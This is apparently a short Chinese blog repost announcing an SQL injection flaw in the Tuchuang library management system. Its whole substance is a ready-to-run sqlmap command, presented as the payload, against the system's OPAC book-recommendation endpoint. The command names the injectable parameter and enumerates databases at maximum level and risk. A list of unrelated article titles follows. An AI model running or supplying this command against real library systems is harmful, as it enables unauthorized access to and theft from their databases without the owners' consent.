图创图书管理SQL注入漏洞

payload

root@kali:~# sqlmap -u http://2*0.*6.***.3:8080/opac/recommend/recommendBookList/list --data="page=1&rows=1&hasNextPage=false&searchType=title&searchValue=aaaaaaa" -p searchValue --leve 5 --risk 3 --dbs -v 1 --batch

原文：http://bobao.360.cn/snapshot/index?id=12760

【推广】免费学中医，健康全家人

原文地址：https://www.cnblogs.com/zuoxiaolongzzz/p/9182290.html

推荐文章
BZOJ 2049 [SDOI2008]洞穴勘测 (LCT)
BZOJ 2631 [国家集训队]Tree II (LCT)
BZOJ 1500 [NOI2005]维修数列 (splay)
BZOJ 1010 [HNOI2008]玩具装箱toy (斜率优化DP)
luogu P2325 [SCOI2005]王室联邦
luogu P3565 [POI2014]HOT-Hotels
Codeforces Round #524 (Div. 2)
NOIP2018TG题解
NOIP2018ty记
luogu P1053 篝火晚会
luogu P1600 天天爱跑步
luogu P1081 开车旅行
luogu P3191 [HNOI2007]紧急疏散EVACUATE
luogu P3707 [SDOI2017]相关分析
openstack
centos7使用rpm方式安装mysql
VUe.js教程
windows的cmd批处理命令及powershell (二)
windows共享文件夹权限设置
python至winreg模块
java相关
cmd批处理命令及powershell
火狐浏览器调试模式
windows 配置java环境变量
Acwing-279-自然数拆分(背包)
Acwing-278-数字组合(背包)
Acwing-277-饼干(DP)
Acwing-274-移动服务(DP)
Acwing-275-传纸条(DP)
Acwing-121-赶牛入圈(二分, 二维前缀和,离散化)